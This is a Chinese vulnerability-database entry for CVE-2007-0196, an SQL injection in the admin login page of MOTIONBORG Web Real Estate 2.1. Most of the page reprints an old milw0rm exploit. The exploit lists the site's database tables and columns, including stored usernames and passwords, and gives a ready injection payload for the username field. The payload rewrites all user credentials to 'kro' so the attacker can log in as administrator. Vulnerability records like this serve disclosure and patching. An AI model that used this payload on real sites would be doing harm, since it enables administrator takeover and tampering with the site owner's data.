MOTIONBORG Web Real Estate 'Admin_Check_User.ASP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111981 漏洞类型 SQL注入
发布时间 2007-01-09 更新时间 2009-01-20
CVE编号 CVE-2007-0196 CNNVD-ID CNNVD-200701-144
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3105
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-144
|漏洞详情
MotionborgWebRealEstate2.1及之前版本的admin_check_user.asp中存在SQL注入漏洞。远程攻击者可以借助用户名字段和其他参数,执行任意的SQL指令。
|漏洞EXP
******************************************************************************
# Title   :  MOTIONBORG Web Real Estate <= v2.1 Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.motionborg.com
# $$      :  Unlimited Agents-> $1,475.00

*******************************************************************************

ajann SQL Injector Beta=>

Script Tables & Columns

[[-dtproperties-]]
id
objectid
property
value
uvalue
lvalue
version
[[-Events-]]
EventId
EventDay
EventStartDate
EventEndDate
EventName
EventDesc
EventIngUrl
EventStatus
[[-MailingList-]]
RecordID
FullName
Phone
Email
Removed
[[-Pole-]]
Record_id
Question
Choice1
Choice2
Choice3
Choice4
Choice5
Result1
Result2
Result3
Result4
Result5
IntranetStart
IntranetEnd
PoleStart
PoleEnd
[[-Poll_Det-]]
RecordId
HdrId
ChoiceEnglish
ChoiceSpanish
ChoiceOrder
ChoiceCount
[[-Poll_Hdr-]]
RecordId
PollId
english_question
spanish_question
startdate
enddate
[[-tblListings-]]
Listing_ID
Date_stamp
Listing_title
Listing
User_ID
Seller
SellerPhone
Seller_email
Address1
Address2
City
County
State
Zip
Country
Status
Transaction
Type
PropertyIconImage
PropertyImages
PropertyImages2
PropertyImages3
PropertyImages4
PropertyImages5
PropertyImages6
PropertyImages7
PropertyImages8
PropertyImages9
PropertyImages10
PropertyFloorPlanImages
Price
Story
StoryType
Bedroom
Bathroom
BathroomHalf
CarGarage
CarGarageHalf
CarGarageAutoDoorOpener
Extras
AdjSquarefeet
LivSquarefeet
ExtrasDescription
DetailDescription
[[-tblSearchConfiguration-]]
Comment_ID
Listing_ID
Name
Country
EMail
Date_stamp
Comments
[[-tblSiteConfiguration-]]
Username
Password
SearchDescription
SearchKeyboards
SiteIntroMediaStatus
SiteIntroMedia
SiteTitle
SiteSlogan
SiteLogoStatus
SiteLogo
SiteVisitsCounterCode
LoanAppStatus
WelcomeMessage
OwnerName
OwnerMessage
OwnerImage
ContactMessage
ContactEmail
ContactPhone
AboutCompany
OportunitiesStatus
Oportunities
UsefullLinksStatus
UsefullLinks
SchoolSearch
IDXstatus
IDXAgentID
IDXSearchURL
ExtAppStatus01
ExtAppStatus02
ExtAppStatus03
ExtAppStatus04
ExtAppStatus05
ExtAppTit01
ExtAppTit02
ExtAppTit03
ExtAppTit04
ExtAppTit05
ExtApp01
ExtApp02
ExtApp03
ExtApp04
ExtApp05
IDXSearchURLExtApp05
site_bg_color
site_text_color
site_text_type
site_links_color
site_visited_links_color
site_active_links_color
site_table_color
site_table_border_color
site_table_title_color
No_records_per_page
[[-tblUsers-]]
User_ID
Username
Password
Name
LastName
User_email
Phone
UserImage
User_code
Active
AdminRights
[[-Users-]]
ID
U_name
U_pass
Fname
Lname

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin_check_user.asp (POST Method) [SQL]

Example:

//Find The UserName and Write-> ';update tblUsers set Password='kro';update tblUsers set Username='kro'--
// Password is empty.

Login "kro" | "kro"

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-09]
|参考资料

来源:XF
名称:motionborg-admincheckuser-sql-injection(31360)
链接:http://xforce.iss.net/xforce/xfdb/31360
来源:BID
名称:21963
链接:http://www.securityfocus.com/bid/21963
来源:MILW0RM
名称:3105
链接:http://www.milw0rm.com/exploits/3105
来源:VUPEN
名称:ADV-2007-0143
链接:http://www.frsirt.com/english/advisories/2007/0143
来源:SECUNIA
名称:23531
链接:http://secunia.com/advisories/23531
来源:OSVDB
名称:32718
链接:http://osvdb.org/32718
来源:MILW0RM
名称:3105
链接:http://milw0rm.com/exploits/3105